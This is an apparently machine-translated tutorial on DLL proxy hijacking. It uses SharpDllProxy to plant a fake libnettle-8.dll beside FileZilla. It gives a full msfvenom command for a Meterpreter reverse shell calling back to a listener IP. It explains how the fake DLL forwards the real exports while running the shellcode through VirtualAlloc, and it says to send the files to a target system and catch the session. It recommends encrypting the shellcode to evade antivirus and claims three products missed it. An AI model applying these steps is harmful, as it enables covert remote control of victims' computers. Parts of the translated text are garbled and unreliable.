How to perform DLL proxy forwarding and weiquan analysis

DLL Hijacking

After the Windows 7 version, the system uses KnowDLLs to manage DLLs, which is located in the registry HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs. The following DLL file It will be prohibited to call from the directory where the exe itself is located, but can only be called from the system directory (System32) directory. The reason for DLL hijacking is that not all DLLs are written to the registry.

Use the dll generated by msfvenom to kill directly.

SharpDllProxy

The name sounds similar to a socks proxy. Tool source from: https://redteaming.co.uk/2020/07/12/dll-proxy-loading-your-favorite-c-implant/. For specific implementation, you can also refer to this boss’s blog.

Preface

First understand the operating principle of the dynamic link library. If application A wants to use the GetFunkyData() function in the dynamic link library DataFunctions.dll, it needs to load the DataFunctions.dll dynamic link library. This tool is based on this consideration. It creates a dynamic link library with the same name as DataFunction.dll. It has two functions: ① Make a shortcut key to forward all functions to the real dynamic link library DataFunctions.dll. , this is the origin of proxy in the name; ② Write shellcode in this fake DataFunctions.dll. Attached is the author's original picture:

Experimental process

Target program

It took some time to do this experiment, such as FileZilla software, how to find this that needs to be loaded What about dll? As the author said, copy the software and you will know what it is missing. As follows:

That means the DLL file needs to be loaded to run the application, so make a fake libnettle-8.dll for this DLL.

Generate shellcode

<br>

<br>

msfvenom -a x64 -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.124.29 LPORT=4444 -f raw > shell.bin

The experiment begins

First download SharpDllProxy: https://github.com/Flangvik/SharpDllProxy, and then use visual studio 2019 to compile it. Try not to use other versions, because I used various visual studio 2017 It took a long time to report the error but it didn’t come out. There may be something wrong with the environment.

Directly use vs to open SharpDllProxy under the file --> Generate solution

Use SharpDllProxy.dll to create a fake libnettle-8.dll file. Place shell.bin and the Dll that needs to be faked into the file in the picture above. Execute the following command: .\SharpDllProxy.exe --dll libnettle-8.dll --payload shell.bin

The generated file contains a C file and a dll. This dll file is the original libnettle-8.dll file.

Let’s analyze this C language program. From line 9 to line 494, they are all functions that forward the DLL. All functions that need to be run are forwarded to the original DLL for processing.

Line 497 is where we inserted the shellcode. This is the only key code. In fact, you can also directly write the shellcode shell.bin to the file, which reduces the number of suspicious files. Here, we read and execute the shellcode in binary mode through VirtualAlloc memory operation. At this point, you can operate like a tiger by yourself, and use various anti-killing postures, such as changing the loading method, such as encrypting the shellcode first and then decrypting it to run.

Use VS to compile the above C file. Select New under the File menu, then select Dynamic Link Library Project and name the project libnettle-8. Copy the above C file code to VS to compile

Send the above three files (tmpD475.dll, libnettle-8.dll, shell.bin) to the target system. Use msf to listen, then run the program, and the session will be returned.

Using the most commonly used anti-virus software: 360, Tinder and Safe Manager were not detected.

The above is the detailed content of How to perform DLL proxy forwarding and weiquan analysis. For more information, please follow other related articles on the PHP Chinese website!